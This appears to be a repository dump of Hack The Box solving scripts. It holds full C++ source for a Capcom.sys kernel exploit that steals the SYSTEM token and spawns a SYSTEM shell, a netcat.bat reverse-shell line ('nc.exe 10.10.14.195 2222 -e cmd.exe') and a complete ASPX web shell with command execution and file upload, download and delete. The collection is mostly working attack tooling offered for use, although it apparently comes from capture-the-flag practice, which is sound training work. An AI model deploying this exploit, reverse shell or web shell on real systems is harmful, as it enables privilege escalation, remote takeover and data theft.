├── .gitmodules ├── LICENSE ├── PowerUp.ps1 ├── README.md ├── exploit-capcom ├── ExploitCapcom.cpp ├── stdafx.cpp ├── stdafx.h └── targetver.h ├── exploit-fuse ├── Capcom.sys ├── EOPLOADDRIVER.exe ├── ExploitCapcom_modded.exe ├── netcat.bat └── shell.exe ├── exploit-worker └── reverseshell.aspx ├── nc.exe └── nc64.exe /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "pspy"] 2 | path = pspy 3 | url = https://github.com/DominicBreuker/pspy 4 | 5 | [submodule "lxd-alpine-builder"] 6 | path = exploit-tabby/lxd-alpine-builder 7 | url = https://github.com/saghul/lxd-alpine-builder 8 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Michael Michel 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hackthebox scripts 2 | Scripts,shell used for solving box 3 | -------------------------------------------------------------------------------- /exploit-capcom/ExploitCapcom.cpp: -------------------------------------------------------------------------------- 1 | // Copyright (c) 2016, Satoshi Tanda. All rights reserved. 2 | // Use of this source code is governed by a MIT-style license that can be 3 | // found in the LICENSE file. 4 | 5 | 6 | #include "stdafx.h" 7 | #pragma comment(lib, "ntdll.lib") 8 | 9 | //////////////////////////////////////////////////////////////////////////////// 10 | // 11 | // macro utilities 12 | // 13 | 14 | //////////////////////////////////////////////////////////////////////////////// 15 | // 16 | // constants and macros 17 | // 18 | 19 | //////////////////////////////////////////////////////////////////////////////// 20 | // 21 | // types 22 | // 23 | 24 | typedef void *PEPROCESS; 25 | 26 | using PSGETCURRENTPROCESSID = HANDLE(NTAPI*)(); 27 | 28 | using PSLOOKUPPROCESSBYPROCESSID = NTSTATUS(NTAPI *)(_In_ HANDLE ProcessId, 29 | _Out_ PEPROCESS * Process); 30 | 31 | using OBDEREFERENCEOBJECT = VOID(NTAPI *)(_In_ PVOID Object); 32 | 33 | using PSREFERENCEPRIMARYTOKEN = PACCESS_TOKEN(NTAPI *)( 34 | _Inout_ PEPROCESS Process); 35 | 36 | using PSDEREFERENCEPRIMARYTOKEN = VOID(NTAPI *)( 37 | _In_ PACCESS_TOKEN PrimaryToken); 38 | 39 | using MMGETSYSTEMROUTINEADDRESS = PVOID(NTAPI *)( 40 | _In_ PUNICODE_STRING SystemRoutineName); 41 | 42 | // Represents shellcode to be executed 43 | #include 44 | typedef struct _SHELLCODE 45 | { 46 | BYTE Nop[1]; 47 | BYTE Sti[1]; 48 | BYTE Jmp[6]; 49 | void *PayloadAddress; 50 | } SHELLCODE, *PSHELLCODE; 51 | #include 52 | 53 | // Represents a layout of in-buffer for the vulnerable IOCTL 54 | typedef struct _IOCTL_IN_BUFFER 55 | { 56 | void *ShellcodeAddress; 57 | SHELLCODE Shellcode; 58 | } IOCTL_IN_BUFFER, *PIOCTL_IN_BUFFER; 59 | 60 | //////////////////////////////////////////////////////////////////////////////// 61 | // 62 | // prototypes 63 | // 64 | 65 | static bool ExploitCapcomDriver(); 66 | 67 | static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress); 68 | 69 | static void *GetSystemRoutineAddress( 70 | MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress, 71 | const wchar_t *RoutineName); 72 | 73 | static PACCESS_TOKEN GetProceesTokenAddress(ULONG_PTR Address); 74 | 75 | static bool LaunchShell(); 76 | 77 | //////////////////////////////////////////////////////////////////////////////// 78 | // 79 | // variables 80 | // 81 | 82 | // Indicates whether token stealing is done successfully 83 | static BOOLEAN gIsTokenStealingSuccessful = FALSE; 84 | 85 | //////////////////////////////////////////////////////////////////////////////// 86 | // 87 | // implementations 88 | // 89 | 90 | int main() 91 | { 92 | ExploitCapcomDriver(); 93 | return 0; 94 | } 95 | 96 | // Makes std::unique_ptr withe a custom deleter 97 | template static 98 | std::unique_ptr make_unique_ex(Resource *p, 99 | Deleter d = Deleter()) 100 | { 101 | return std::unique_ptr(p, std::forward(d)); 102 | } 103 | 104 | // Exploits the vulnerable feature in capcom.sys and launches the SYSTEM cmd.exe 105 | static bool ExploitCapcomDriver() 106 | { 107 | std::cout << std::hex; 108 | std::cout << "[*] Capcom.sys exploit" << std::endl; 109 | 110 | // Open the device created by Capcom.sys 111 | auto DeviceHandle = make_unique_ex( 112 | CreateFile(TEXT("\\\\.\\Htsysm72FB"), GENERIC_READ | GENERIC_WRITE, 113 | FILE_SHARE_READ | FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 114 | FILE_ATTRIBUTE_NORMAL, nullptr), 115 | ::CloseHandle); 116 | if (DeviceHandle.get() == INVALID_HANDLE_VALUE) 117 | { 118 | std::cout << "[-] CreateFile failed" << std::endl; 119 | return false; 120 | } 121 | std::cout << "[*] Capcom.sys handle was obtained as " << DeviceHandle.get() 122 | << std::endl; 123 | 124 | // 125 | // Allocate an executable memory containing shellcode. The data structure 126 | // should have an address of code to executed. In this exploit, trampoline 127 | // code leads to KernelPayload is also given as the function to execute. 128 | // 129 | auto InBufferContents = reinterpret_cast(VirtualAlloc( 130 | nullptr, sizeof(IOCTL_IN_BUFFER), MEM_COMMIT, PAGE_EXECUTE_READWRITE)); 131 | if (!InBufferContents) 132 | { 133 | std::cout << "[-] VirtualAlloc failed" << std::endl; 134 | return false; 135 | } 136 | InBufferContents->ShellcodeAddress = &InBufferContents->Shellcode; 137 | 138 | // 139 | // This code is executed first by the feature on PASSIVE_LEVEL, interruption 140 | // disabled state. This shellcode first enables interruptions so that 141 | // Windows can page-in the KernelPayload even if it is paged-out, and 142 | // KernelPayload can call kernel API. Then this code transfers execution to 143 | // KernelPayload. 144 | // 145 | // 146 | InBufferContents->Shellcode = { 147 | { 0x90, }, // nop ; for debugging 148 | { 0xfb, }, // sti 149 | { 0xff, 0x25, 0x00, 0x00, 0x00, 0x00, }, // jmp qword ptr [nextline] 150 | // nextline: 151 | &KernelPayload, // dq KernelPayload 152 | }; 153 | std::cout << "[*] Shellcode was placed at " << &InBufferContents->Shellcode 154 | << std::endl; 155 | 156 | // +8 because, capcom.sys uses an address of IOCTL buffer - 8 157 | auto InBuffer = reinterpret_cast(InBufferContents) + 8; 158 | static_assert(sizeof(InBuffer) == 8, "an in buffer size must be 8"); 159 | 160 | uint32_t OutBuffer = 0; 161 | static_assert(sizeof(OutBuffer) == 4, "an out buffer size must be 4"); 162 | 163 | // Issue IOCTL for the vulnerable feature 164 | static const DWORD VulnerableIoctlCode = 0xaa013044; 165 | DWORD BytesReturned = 0; 166 | auto Ok = DeviceIoControl(DeviceHandle.get(), VulnerableIoctlCode, &InBuffer, 167 | sizeof(InBuffer), &OutBuffer, sizeof(OutBuffer), 168 | &BytesReturned, nullptr); 169 | VirtualFree(InBufferContents, 0, MEM_RELEASE); // no longer necessary 170 | if (!Ok) 171 | { 172 | std::cout << "[-] DeviceIoControl failed" << std::endl; 173 | return false; 174 | } 175 | std::cout << "[+] Shellcode was executed" << std::endl; 176 | 177 | // Is this process running in the SYSTEM privileges 178 | if (!gIsTokenStealingSuccessful) 179 | { 180 | std::cout << "[-] Token stealing failed" << std::endl; 181 | return false; 182 | } 183 | std::cout << "[+] Token stealing was successful" << std::endl; 184 | 185 | // Launch command prompt 186 | if (!LaunchShell()) 187 | { 188 | std::cout << "[-] CreateProcess() failed" << std::endl; 189 | return false; 190 | } 191 | std::cout << "[+] The SYSTEM shell was launched" << std::endl; 192 | std::cout << "[*] Press any key to exit this program" << std::endl; 193 | getchar(); 194 | return true; 195 | } 196 | 197 | // 198 | // Performs token stealing and elevates the current process to SYSTEM 199 | // 200 | static void KernelPayload(MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress) 201 | { 202 | auto PsLookupProcessByProcessId = 203 | reinterpret_cast(GetSystemRoutineAddress( 204 | MmGetSystemRoutineAddress, L"PsLookupProcessByProcessId")); 205 | 206 | auto ObDereferenceObject = 207 | reinterpret_cast(GetSystemRoutineAddress( 208 | MmGetSystemRoutineAddress, L"ObDereferenceObject")); 209 | 210 | auto PsReferencePrimaryToken = 211 | reinterpret_cast(GetSystemRoutineAddress( 212 | MmGetSystemRoutineAddress, L"PsReferencePrimaryToken")); 213 | 214 | auto PsDereferencePrimaryToken = 215 | reinterpret_cast(GetSystemRoutineAddress( 216 | MmGetSystemRoutineAddress, L"PsDereferencePrimaryToken")); 217 | 218 | auto PsGetCurrentProcessId = 219 | reinterpret_cast(GetSystemRoutineAddress( 220 | MmGetSystemRoutineAddress, L"PsGetCurrentProcessId")); 221 | 222 | // Get the process object of the kernel 223 | auto SystemProcess = 224 | *reinterpret_cast(GetSystemRoutineAddress( 225 | MmGetSystemRoutineAddress, L"PsInitialSystemProcess")); 226 | 227 | // Get the process object of the current process 228 | PEPROCESS CurrentProcess = nullptr; 229 | NTSTATUS Status = PsLookupProcessByProcessId(PsGetCurrentProcessId(), 230 | &CurrentProcess); 231 | if (!NT_SUCCESS(Status)) 232 | { 233 | return; 234 | } 235 | 236 | auto CurrentToken = PsReferencePrimaryToken(CurrentProcess); 237 | auto SystemToken = PsReferencePrimaryToken(SystemProcess); 238 | 239 | // Search the token field from EPROCESS up to a 0x80 pointers size 240 | for (auto Offset = 0ul; Offset < sizeof(void *) * 0x80; 241 | Offset += sizeof(void *)) 242 | { 243 | // Is this address stores token? 244 | const auto TestAddress = 245 | reinterpret_cast(CurrentProcess) + Offset; 246 | const auto ProbableToken = GetProceesTokenAddress(TestAddress); 247 | if (ProbableToken == CurrentToken) 248 | { 249 | // Found the field, replace the contents with the SYSTEM token 250 | auto TokenAddress = reinterpret_cast(TestAddress); 251 | *TokenAddress = SystemToken; 252 | gIsTokenStealingSuccessful = TRUE; 253 | break; 254 | } 255 | } 256 | 257 | PsDereferencePrimaryToken(CurrentToken); 258 | PsDereferencePrimaryToken(SystemToken); 259 | ObDereferenceObject(CurrentProcess); 260 | } 261 | 262 | // Returns an address of exports in NT or HAL 263 | static void *GetSystemRoutineAddress( 264 | MMGETSYSTEMROUTINEADDRESS MmGetSystemRoutineAddress, 265 | const wchar_t *RoutineName) 266 | { 267 | UNICODE_STRING RoutineNameU = {}; 268 | RtlInitUnicodeString(&RoutineNameU, RoutineName); 269 | return MmGetSystemRoutineAddress(&RoutineNameU); 270 | } 271 | 272 | // Returns an address of a token assuming that Address points to the Token field 273 | static PACCESS_TOKEN GetProceesTokenAddress(ULONG_PTR Address) 274 | { 275 | // 276 | // To get an address of a token from the Token field in EPROCESS, the lowest 277 | // N bits where N is size of a RefCnt field needs to be masked. 278 | // 279 | // kd> dt nt!_EX_FAST_REF 280 | // + 0x000 Object : Ptr64 Void 281 | // + 0x000 RefCnt : Pos 0, 4 Bits 282 | // + 0x000 Value : Uint8B 283 | // 284 | const auto Value = *reinterpret_cast(Address); 285 | return reinterpret_cast(Value & 286 | (static_cast(~0xf))); 287 | } 288 | 289 | // Launches a command shell process 290 | static bool LaunchShell() 291 | { 292 | TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe"); 293 | PROCESS_INFORMATION ProcessInfo; 294 | STARTUPINFO StartupInfo = { sizeof(StartupInfo) }; 295 | if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE, 296 | CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo, 297 | &ProcessInfo)) 298 | { 299 | return false; 300 | } 301 | 302 | CloseHandle(ProcessInfo.hThread); 303 | CloseHandle(ProcessInfo.hProcess); 304 | return true; 305 | } 306 | -------------------------------------------------------------------------------- /exploit-capcom/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // ExploitCapcom.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /exploit-capcom/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | #include 13 | 14 | #include 15 | #include 16 | #include 17 | 18 | 19 | // TODO: reference additional headers your program requires here 20 | -------------------------------------------------------------------------------- /exploit-capcom/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /exploit-fuse/Capcom.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mach1el/htb-scripts/7baec1fa425bf7eb4dfce180601040099b3b2d3d/exploit-fuse/Capcom.sys -------------------------------------------------------------------------------- /exploit-fuse/EOPLOADDRIVER.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mach1el/htb-scripts/7baec1fa425bf7eb4dfce180601040099b3b2d3d/exploit-fuse/EOPLOADDRIVER.exe -------------------------------------------------------------------------------- /exploit-fuse/ExploitCapcom_modded.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mach1el/htb-scripts/7baec1fa425bf7eb4dfce180601040099b3b2d3d/exploit-fuse/ExploitCapcom_modded.exe -------------------------------------------------------------------------------- /exploit-fuse/netcat.bat: -------------------------------------------------------------------------------- 1 | c:\temp\nc.exe 10.10.14.195 2222 -e cmd.exe 2 | -------------------------------------------------------------------------------- /exploit-fuse/shell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mach1el/htb-scripts/7baec1fa425bf7eb4dfce180601040099b3b2d3d/exploit-fuse/shell.exe -------------------------------------------------------------------------------- /exploit-worker/reverseshell.aspx: -------------------------------------------------------------------------------- 1 | <%-- ASPX Shell by LT (2007) --%> 2 | <%@ Page Language="C#" EnableViewState="false" %> 3 | <%@ Import Namespace="System.Web.UI.WebControls" %> 4 | <%@ Import Namespace="System.Diagnostics" %> 5 | <%@ Import Namespace="System.IO" %> 6 | 7 | <% 8 | string outstr = ""; 9 | 10 | // get pwd 11 | string dir = Page.MapPath(".") + "/"; 12 | if (Request.QueryString["fdir"] != null) 13 | dir = Request.QueryString["fdir"] + "/"; 14 | dir = dir.Replace("\\", "/"); 15 | dir = dir.Replace("//", "/"); 16 | 17 | // build nav for path literal 18 | string[] dirparts = dir.Split('/'); 19 | string linkwalk = ""; 20 | foreach (string curpart in dirparts) 21 | { 22 | if (curpart.Length == 0) 23 | continue; 24 | linkwalk += curpart + "/"; 25 | outstr += string.Format("{1}/ ", 26 | HttpUtility.UrlEncode(linkwalk), 27 | HttpUtility.HtmlEncode(curpart)); 28 | } 29 | lblPath.Text = outstr; 30 | 31 | // create drive list 32 | outstr = ""; 33 | foreach(DriveInfo curdrive in DriveInfo.GetDrives()) 34 | { 35 | if (!curdrive.IsReady) 36 | continue; 37 | string driveRoot = curdrive.RootDirectory.Name.Replace("\\", ""); 38 | outstr += string.Format("{1} ", 39 | HttpUtility.UrlEncode(driveRoot), 40 | HttpUtility.HtmlEncode(driveRoot)); 41 | } 42 | lblDrives.Text = outstr; 43 | 44 | // send file ? 45 | if ((Request.QueryString["get"] != null) && (Request.QueryString["get"].Length > 0)) 46 | { 47 | Response.ClearContent(); 48 | Response.WriteFile(Request.QueryString["get"]); 49 | Response.End(); 50 | } 51 | 52 | // delete file ? 53 | if ((Request.QueryString["del"] != null) && (Request.QueryString["del"].Length > 0)) 54 | File.Delete(Request.QueryString["del"]); 55 | 56 | // receive files ? 57 | if(flUp.HasFile) 58 | { 59 | string fileName = flUp.FileName; 60 | int splitAt = flUp.FileName.LastIndexOfAny(new char[] { '/', '\\' }); 61 | if (splitAt >= 0) 62 | fileName = flUp.FileName.Substring(splitAt); 63 | flUp.SaveAs(dir + "/" + fileName); 64 | } 65 | 66 | // enum directory and generate listing in the right pane 67 | DirectoryInfo di = new DirectoryInfo(dir); 68 | outstr = ""; 69 | foreach (DirectoryInfo curdir in di.GetDirectories()) 70 | { 71 | string fstr = string.Format("{1}", 72 | HttpUtility.UrlEncode(dir + "/" + curdir.Name), 73 | HttpUtility.HtmlEncode(curdir.Name)); 74 | outstr += string.Format("{0}<DIR>", fstr); 75 | } 76 | foreach (FileInfo curfile in di.GetFiles()) 77 | { 78 | string fstr = string.Format("{1}", 79 | HttpUtility.UrlEncode(dir + "/" + curfile.Name), 80 | HttpUtility.HtmlEncode(curfile.Name)); 81 | string astr = string.Format("Del", 82 | HttpUtility.UrlEncode(dir), 83 | HttpUtility.UrlEncode(dir + "/" + curfile.Name)); 84 | outstr += string.Format("{0}{1:d}{2}", fstr, curfile.Length / 1024, astr); 85 | } 86 | lblDirOut.Text = outstr; 87 | 88 | // exec cmd ? 89 | if (txtCmdIn.Text.Length > 0) 90 | { 91 | Process p = new Process(); 92 | p.StartInfo.CreateNoWindow = true; 93 | p.StartInfo.FileName = "cmd.exe"; 94 | p.StartInfo.Arguments = "/c " + txtCmdIn.Text; 95 | p.StartInfo.UseShellExecute = false; 96 | p.StartInfo.RedirectStandardOutput = true; 97 | p.StartInfo.RedirectStandardError = true; 98 | p.StartInfo.WorkingDirectory = dir; 99 | p.Start(); 100 | 101 | lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd(); 102 | txtCmdIn.Text = ""; 103 | } 104 | %> 105 | 106 | 107 | 108 | 109 | 110 | ASPX Shell 111 | 121 | 122 | 123 |

ASPX Shell by LT

124 |
125 | 126 | 127 | 133 | 156 | 157 |
128 |

Shell

129 | 130 | 131 |
132 | 		134 |

File Browser

135 |

136 | Drives:
137 | 138 |

139 |

140 | Working directory:
141 | 142 |

143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 |
NameSize KBActions
151 |

Upload to this directory:
152 | 153 | 154 |

155 |
158 | 159 |
160 | 161 | 162 | 163 | -------------------------------------------------------------------------------- /nc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mach1el/htb-scripts/7baec1fa425bf7eb4dfce180601040099b3b2d3d/nc.exe -------------------------------------------------------------------------------- /nc64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mach1el/htb-scripts/7baec1fa425bf7eb4dfce180601040099b3b2d3d/nc64.exe --------------------------------------------------------------------------------